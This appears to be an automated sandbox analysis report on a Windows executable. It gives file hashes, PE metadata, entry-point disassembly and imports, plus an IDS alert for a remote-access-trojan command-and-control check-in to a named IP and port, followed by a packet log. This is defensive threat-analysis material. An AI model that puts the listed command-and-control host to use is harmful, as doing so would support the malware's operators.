                                                                                                                      SHA-512:676C337E3B4A1C22D52C5000ED8ABF0E233C558C7B46A690CEC8ED26C76D2C6DAF265EBCBC51FB9B863A8D4E381ADA5859D4EEEC4DF30150C7FBA3B5F5DF8DC0
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/ccb7c2a6-17dd-4cc3-88b7-8da966e59f59.png
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):557
                                                                                                                      Entropy (8bit):5.017920631493034
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:DEARGUGLqcidEEblemSFxEARuWGBUGLqcSWGBdEEbleeESFZ:D1Jcsl21uWHcSWilv
                                                                                                                      MD5:A722775809D2312F435036DEF15BCD62
                                                                                                                      SHA1:2C6CF2D7ED0D1810B6C96269A4509071575E5771
                                                                                                                      SHA-256:4DF68C42ED06B94BC6C7655FFA3F84487DCF88F2452B8BF43C217427E36E31A2
                                                                                                                      SHA-512:3A4325C787C32BB7373B73CF419E94200167AA7CF2E689E4E1F8D46C8D9DE7607A4EAA3A346F25C3711723A30C678DE61F8813EBF81EEB66EA536968825F6B43
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/back-to-top-button/v1/back-to-top-button/clientlibs/sites.min.ACSHASHa722775809d2312f435036def15bcd62.css
                                                                                                                      Preview:@media screen and (max-width:540px){.sticky.back-to-top.stuck{position:static}.}.@media screen and (min-width:540px){.sticky.back-to-top.pageHasChatContainer{bottom:32px !important;left:12px}.}.div.backToTopEditView[data-mount='back-to-top']{opacity:1 !important}.@media screen and (max-width:540px){.fixed-sticky.fixed-back-to-top.stuck{position:static}.}.@media screen and (min-width:540px){.fixed-sticky.fixed-back-to-top.pageHasChatContainer{bottom:32px !important;left:12px}.}.div.backToTopEditView[data-mount='fixed-back-to-top']{opacity:1 !important}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (30237)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):30289
                                                                                                                      Entropy (8bit):5.260974426031687
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:u2E2n0SMB/2ZsJIjrAWJdvgmfQFc6mjVqMP62A86uIz3yR:u1M0S0/ks2JdImYFcw662A86vzyR
                                                                                                                      MD5:F04D3E51969894BD486CD9A9A1549EA6
                                                                                                                      SHA1:6DB7ED2E034FE99F5013144CA91DD21408F7AC36
                                                                                                                      SHA-256:33A747222E8AE5381AEB53C9671BB3EB309B7226587674CD6D901F99645A852B
                                                                                                                      SHA-512:C7BE3DAB8EF8DBCB3A0AA6022F8191F155358E4E974F0E42F9CD88C372EE77EB4513A6CC54E373CFE90232D67C6B02406B4D281D8158C24B51C8AA433452911C
                                                                                                                      Malicious:false
                                                                                                                      URL:https://mem.gfx.ms/meversion?partner=SMCConvergence&market=en-us&uhf=1
                                                                                                                      Preview:window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"smcconvergence","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","instKey":"b8ffe739c47a401190627519795ca4d2-044a8309-9d4b-430b-9d47-6e87775cbab6-6888","oneDSUrl":"https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graphv2":false,"graphinfo":{"graphclientid":null,"graphscope":null,"graphcodeurl":null,"graphredirecturi":null,"graphphotourl":null},"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/","authA
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (32761)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):207132
                                                                                                                      Entropy (8bit):5.120233025860125
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:KWHSGu7HDm48tljfy6l6Fr1RPG4xy8Swqp:KgWDm48tljfy6l6Fr1RPG4xy8Swqp
                                                                                                                      MD5:BE9ECFC70EAE42CCAC8A69FE1E11332F
                                                                                                                      SHA1:B8ED04004EF83444576DC39A0289652825092742
                                                                                                                      SHA-256:F590C43ACB8FE26F9D019BEAB2C935655E04A78C1E7CF637B68746A3490610D4
                                                                                                                      SHA-512:21BE3071A5A480B4E957409B125D0454845C3DC7D13C85466E73FBC2D09621EC3C7A7F5A754D21BB5BBB6BA9B30B4D054AD2176595BD607D7498BB4552450DE7
                                                                                                                      Malicious:false
                                                                                                                      URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/launch-ENbb9d0de7cc374dc99259df2c4b823cef.min.js
                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/launch-ENbb9d0de7cc374dc99259df2c4b823cef.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-12-27T06:55:08Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"ENbb9d0de7cc374dc99259df2c4b823cef",stage:"production"},dataElements:{"JSLL RedTiger":{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return $("#primaryArea[data-m]").length>0}}},MSCC_Consent:{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return!(void 0!==window.mscc&&"function"==typeof window.mscc.hasConsent&&!window.mscc.hasConsent())}}},CMS:{storageDuration:"pageview",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return $("#primaryArea[data-m]").length>0?"RedT":"string"==typeof window.mldcc?"Azure":document.querySelector&&document.querySele
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (1998)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):530473
                                                                                                                      Entropy (8bit):5.1558754449004525
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:cJpYYYb5T2ZggigVl1e/zXJ5lbgutNPzedZTyatWYLe8dZshIw:cJpYb5T2Zggigv1e/zXJLbgunzedZTyT
                                                                                                                      MD5:13ABF4CF4F8384D04A599349524DBBAD
                                                                                                                      SHA1:BD1EE95DB4A6E7A1EE1937F47AD7C5B6D7633465
                                                                                                                      SHA-256:3E7CE05C8874B9F3628300101F40878DF98F23A09CD4ECC9C9E5CC8067D9068A
                                                                                                                      SHA-512:4FCA93D865844FFF1A452B343F75ED786111F1E508505DD841F954159A42E5B9CB587FDC8ADEEA431A14CD042FC4CF16305416CE4CA0C1E9D5E66803C2BD03A7
                                                                                                                      Malicious:false
                                                                                                                      Preview:./*!. * MWF (Moray) Extensions v2.15.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */..(function (global, factory) {..typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :..typeof define === 'function' && define.amd ? define(['exports'], factory) :..(global = typeof globalThis !== 'undefined' ? globalThis : global || self, factory(global.mwf = {}));.})(this, (function (exports) { 'use strict';...var commonjsGlobal = typeof globalThis !== 'undefined' ? globalThis : typeof window !== 'undefined' ? window : typeof global !== 'undefined' ? global : typeof self !== 'undefined' ? self : {};...var check = function (it) {.. return it && it.Math == Math && it;..};...// https://github.com/zloirock/core-js/issues/86#issuecomment-115759028..var global$a =.. // eslint-disable-next-line es/no-global-this -- safe.. check(typeof globalTh
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (889)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):92962
                                                                                                                      Entropy (8bit):5.482012211093105
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:wB4vGoYlmQr+IDv1Ty/6RsSz5TGF/46nNUgDbC03vu9FnHKDfa6Z/VUhdIKq6Tjv:wqxNrNG9FnHKD/oIKq6Tjv
                                                                                                                      MD5:35986A813756F39AB6B922979FFEDB03
                                                                                                                      SHA1:C8E2213BBAFAF535DA9C6676F3DBA43449E4D15A
                                                                                                                      SHA-256:E2D92BDAAD925C6D355331A338384EE3FF82492352975DD4EFDA791AEF4AB3F5
                                                                                                                      SHA-512:289F1C432E73F611D54EB1130013174174222A0C5EEF8E2464C5FD51EE33DC702326EEECA80B2AAE213DB2FCCB149297FC37CC9A0B6CF6E928A66BC27843F930
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery.min.ACSHASH35986a813756f39ab6b922979ffedb03.js
                                                                                                                      Preview:/*. jQuery JavaScript Library v3.5.1. https://jquery.com/.. Includes Sizzle.js. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://jquery.org/license.. Date: 2020-05-04T22:49Z. Sizzle CSS Selector Engine v2.3.5. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://js.foundation/.. Date: 2020-03-14.*/.'use strict';(function(H,Sa){"object"===typeof module&&"object"===typeof module.exports?module.exports=H.document?Sa(H,!0):function(Ta){if(!Ta.document)throw Error("jQuery requires a window with a document");return Sa(Ta)}:Sa(H)})("undefined"!==typeof window?window:this,function(H,Sa){function Ta(a,b,c){c=c||M;var d,f=c.createElement("script");f.text=a;if(b)for(d in Kc)(a=b[d]||b.getAttribute&&b.getAttribute(d))&&f.setAttribute(d,a);c.head.appendChild(f).parentNode.removeChild(f)}function Ia(a){return null==.a?a+"":"object"===typeof a||"function"===typeof a?db[Ob.call(a)]
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (309), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):309
                                                                                                                      Entropy (8bit):4.971196656935236
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:QuVtCiR2cIT53AM+64uT7nadCkq9KwhA6ONHSInadLb1wnzjCY1ee:jVtCyB4w1cWdYpAfVSVdLa8e
                                                                                                                      MD5:D7106DB242C2B41F88A1B02418BEC7E2
                                                                                                                      SHA1:7A445118F0B5712744AA4AED6889B28C1E7779F7
                                                                                                                      SHA-256:044527A735B287BD84D2AE6D2D3B89C85B52C9750BB07E5AEF19FB8F28F0442B
                                                                                                                      SHA-512:C493FBD6926006108E56E23BB204BFE59A7364ED6D2409B5B258D9EA6C060259E13A7E7A22021607F6EDD55EEA52C75DFE7FCF18BB76D6E539FBD763BF399185
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/dynamicclientsidelibs/handlerscripts/v1.min.ACSHASHd7106db242c2b41f88a1b02418bec7e2.js
                                                                                                                      Preview:'use strict';var DynamicClientSideScriptHandler=function(){return{fetchScriptLink:function(b){var a=(a=document.querySelector('div[data-identifier\x3d"'+b+'"]'))?a.getAttribute("data-content"):null;null===a&&(a=(b=document.querySelector('meta[name\x3d"'+b+'"]'))?b.getAttribute("content"):null);return a}}}();
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 150177
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):52015
                                                                                                                      Entropy (8bit):7.9952734547685935
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:vJhGm+7PUzhQu7xb5fpuSijlAVYYHNkPyJvs:RoA9l7FPRuAVYYHiPyJvs
                                                                                                                      MD5:5F28D22CDF37837FA88F08A2050983AF
                                                                                                                      SHA1:2FC8592FB2E4BE8193919AD56EE8588B24E7C0BE
                                                                                                                      SHA-256:6E207B57EF73C7406D23E2533231E94B58B3C52AC63D208EC6664B152EC5B544
                                                                                                                      SHA-512:DD526C86ACD7D940E54F9F6F848F03A4881DF9E17A067E7231E3D1765D846D0741FAFA8D7C89395B644CB6E0CB71098807411A0F534EA148379D23D31A032104
                                                                                                                      Malicious:false
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text, with very long lines (42133)
Category: dropped
Size (bytes): 138067
Entropy (8bit): 5.225028044529473
Encrypted: false
SSDEEP: 3072:1f4HuF7pxnISnJ9d1EwgXA7nKRZMK/xw/:1f4Hu1I+kw/
MD5: B9C3E4320DB870036919F1EE117BDA6E
SHA1: 29B5A9066B5B1F1FE5AFE7EE986E80A49E86606A
SHA-256: A1FE019388875B696EDB373B51A51C0A8E3BAD52CD489617D042C0722BDB1E48
SHA-512: A878B55E8C65D880CDF14850BAEE1F82254C797C3284485498368F9128E42DCA46F54D9D92750EEEB547C42CAB9A9823AA9AFAB7D881090EBBFA1135CDD410B6
Malicious: false
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text, with very long lines (584)
Category: dropped
Size (bytes): 6798
Entropy (8bit): 5.383941368080596
Encrypted: false
SSDEEP: 192:2+ocdo4VYgB9G/0y/qhNJ5k4iflBDHndCjOGGWr:2+ocdo4B7G/0yyNSflhndCjOGGA
MD5: 1DABD5CC3F7B68C178B59EA74DC62947
SHA1: B8DF9D8FD267B8B74325667DC97278CCC90A1464
SHA-256: E49EFB0A75AF4995902362EA679A0FC4EB120A881A090CB8424D5CBD183436A2
SHA-512: 8C26E45CA37AC5DCCCC0C7BBCA92E0E8E11FB807A6D9A6916D5A0CC1CF198A7942DD5583C31ACBD1A11DDE004C252806D205E9CFDA7F494A6F7D5BBFA42920E4
Malicious: false
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text, with very long lines (3385), with no line terminators
Category: downloaded
Size (bytes): 3385
Entropy (8bit): 5.293928956465786
Encrypted: false
SSDEEP: 96:W4zB+C3yvyE14QHzsyTz4n/2yx/2ydgC2ZPXOMs9:Wy+C3y6k4QPItzqC2xXOMs9
MD5: 838B4CF03009164350BEE28EC54B1B28
SHA1: 7289901F526CD15984F080E40BBF8B8B6098EB73
SHA-256: 70C7CD74052E7BB3716548F7748B7FBF90C8BB39B0F688495B5D3D8974295A72
SHA-512: 48763334DD0DE579917B94CC53A7D002AFF1D5EF46D2D4BEA8991B05ACB355CD67A21495751EDCB89DFB0A6AE3F773419DAFF49A6DFE9EA48CC8E80BCBF99BF1
Malicious: false
URL: https://support.microsoft.com/css/StickyFeedback/sticky-feedback.css?v=cMfNdAUue7NxZUj3dIt_v5DIuzmw9ohJW109iXQpWnI
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 7.998221661432658
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: T1#U52a9#U624b1.0.1.exe
File size: 38'135'059 bytes
MD5: 477d3b9ee775c048f96b450dd00ba490
SHA1: 81f1991882b1bf1cb4b169da6c94b772517ab1eb
SHA256: 799084320848500fef5673799157b94c1db7b74f9651ffe0af326051973cf490
SHA512: f537425e54a310723ba57d77b147af4dda06cc6eef1a51fdd16374e4696089e95dfa6e8a20188fa6167e2504628a3d31bff17dbf7bde5db5442761a271e43c1a
SSDEEP: 786432:lQLDyaGdLEb0s4mkpLirq7P/aSL7plE7xEh+W:lQLDJl2mkpLsq7naSL1lwxER
TLSH: 0F87331AF27B7194FD70A4BE41E54D74CA77A216C36D848F82A4320F4F93886EA77B44
Icon Hash: 381ca9998cacbebe
Entrypoint: 0x14000b310
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x67659260 [Fri Dec 20 15:50:56 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 2
File Version Major: 5
File Version Minor: 2
Subsystem Version Major: 5
Subsystem Version Minor: 2
Import Hash: 0b5552dccd9d0a834cea55c0c8fc05be
Instruction
dec eax
sub esp, 28h
call 00007F60C4DD5C6Ch
dec eax
add esp, 28h
jmp 00007F60C4DD587Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F60C4DD61E4h
test eax, eax
je 00007F60C4DD5A23h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F60C4DD5A07h
dec eax
cmp ecx, eax
je 00007F60C4DD5A16h
xor eax, eax
dec eax
cmpxchg dword ptr [0004121Ch], ecx
jne 00007F60C4DD59F0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F60C4DD59F9h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
movzx eax, byte ptr [00041207h]
test ecx, ecx
mov ebx, 00000001h
cmove eax, ebx
mov byte ptr [000411F7h], al
call 00007F60C4DD5FE3h
call 00007F60C4DD7112h
test al, al
jne 00007F60C4DD5A06h
xor al, al
jmp 00007F60C4DD5A16h
call 00007F60C4DE36F1h
test al, al
jne 00007F60C4DD5A0Bh
xor ecx, ecx
call 00007F60C4DD7122h
jmp 00007F60C4DD59ECh
mov al, bl
dec eax
add esp, 20h
pop ebx
ret
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000411BCh], 00000000h
mov ebx, ecx
jne 00007F60C4DD5A69h
cmp ecx, 01h
jnbe 00007F60C4DD5A6Ch
call 00007F60C4DD614Ah
test eax, eax
je 00007F60C4DD5A2Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3bd0c | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x153c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x4e000 | 0x20c4 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x54000 | 0x758 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x39480 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39340 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2a000 | 0x418 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x28800 | 0x28800 | 443d51fb84559b563832949912f06b00 | False | 0.5583465952932098 | data | 6.488023200564254 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2a000 | 0x12b16 | 0x12c00 | 03cb905c3f1d41732066c037532cd74c | False | 0.51546875 | data | 5.824610481275219 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3d000 | 0x103f8 | 0xe00 | afabb66fdcd2825de5909f10c900fca7 | False | 0.13309151785714285 | DOS executable (block device driver \377\3) | 1.8096886543499544 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x4e000 | 0x20c4 | 0x2200 | 7b210ceebebc00c96d1c55c2b456bbb4 | False | 0.47794117647058826 | data | 5.274096406482418 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x51000 | 0x15c | 0x200 | c059b775abce97446903f3597b027fae | False | 0.384765625 | data | 2.808567494642619 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x52000 | 0x153c | 0x1600 | 60f303f9f424891fa7b1e054893c5a44 | False | 0.4366122159090909 | data | 5.297323385124905 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x54000 | 0x758 | 0x800 | 11aaafc72361ec8886a740c3e209ceb3 | False | 0.544921875 | data | 5.2576643703968475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x520e8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.43150319829424305
RT_GROUP_ICON | 0x52f90 | 0x14 | data | | | 1.15
RT_MANIFEST | 0x52fa4 | 0x596 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.4461538461538462
| DLL | Import |
| --- | --- |
| USER32.dll | CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW |
| COMCTL32.dll | |
| KERNEL32.dll | GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, IsValidCodePage, GetACP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetOEMCP, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetEndOfFile, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW |
| ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW |
| GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-12-29T13:40:37.759404+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49905 | 8.212.101.195 | 1122 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
                                                                                                                      Dec 29, 2024 13:40:40.592391968 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.598361015 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.598426104 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.598479986 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.601205111 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.601222992 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.601274967 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.605725050 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.605879068 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.605943918 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.609942913 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.610130072 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.610179901 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.614353895 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.614509106 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.614582062 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.618546009 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.618685961 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.621196032 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.622569084 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.622704983 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.622756958 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.626821041 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.626965046 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.627010107 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.631100893 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.631242990 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.633229971 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.635271072 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.635406971 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.635462999 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.639482021 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.639617920 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.639669895 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.643754005 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.643858910 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.643909931 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.647934914 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.648078918 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.648122072 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.652189016 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.652307987 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.652369976 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.656311035 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.656419992 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.656506062 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.660408020 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.660523891 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.660571098 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.664635897 CET1122499058.212.101.195192.168.2.4
